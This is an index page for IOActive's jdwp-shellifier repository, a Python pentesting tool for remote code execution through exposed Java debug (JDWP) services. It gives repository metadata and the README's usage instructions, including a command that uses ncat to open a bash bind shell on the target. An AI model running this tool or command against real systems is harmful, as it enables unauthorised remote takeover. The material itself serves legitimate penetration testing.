Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/IOActive/jdwp-shellifier
https://github.com/IOActive/jdwp-shellifier
Last synced: 21 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/IOActive/jdwp-shellifier
- Owner: IOActive
- License: mit
- Created: 2014-04-08T14:57:53.000Z (over 10 years ago)
- Default Branch: master
- Last Pushed: 2023-12-24T15:02:18.000Z (12 months ago)
- Last Synced: 2024-08-05T17:42:20.244Z (4 months ago)
- Language: Python
- Size: 15.6 KB
- Stars: 815
- Watchers: 50
- Forks: 275
- Open Issues: 6
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - IOActive/jdwp-shellifier - (Python)
README
# JDWP exploitation script
## What is it ?
This exploitation script is meant to be used by pentesters against active JDWP service, in order to gain Remote Code Execution.## How does it work ?
Well, in a pretty standard way, the script only requires a Python 2 interpreter:% python ./jdwp-shellifier.py -h
usage: jdwp-shellifier.py [-h] -t IP [-p PORT] [--break-on JAVA_METHOD]
[--cmd COMMAND]Universal exploitation script for JDWP by @_hugsy_
optional arguments:
-h, --help show this help message and exit
-t IP, --target IP Remote target IP (default: None)
-p PORT, --port PORT Remote target port (default: 8000)
--break-on JAVA_METHOD
Specify full path to method to break on (default:
java.net.ServerSocket.accept)
--cmd COMMAND Specify full path to method to break on (default:
None)To target a specific host/port:
$ python ./jdwp-shellifier.py -t my.target.ip -p 1234
This command will only inject Java code on the JVM and show some info like Operating System, Java version. Since it does not execute external code/binary, it is totally safe and can be used as Proof-Of-Concept$ python ./jdwp-shellifier.py -t my.target.ip -p 1234 --cmd "ncat -v -l -p 1234 -e /bin/bash"
This command will actually execute the process `ncat` with the specified argument with the rights given to the running JVM.Before sending questions, make sure to read http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html for full understanding of the JDWP protocol.
## Thanks
* Ilja Van Sprundel
* Sebastien Macke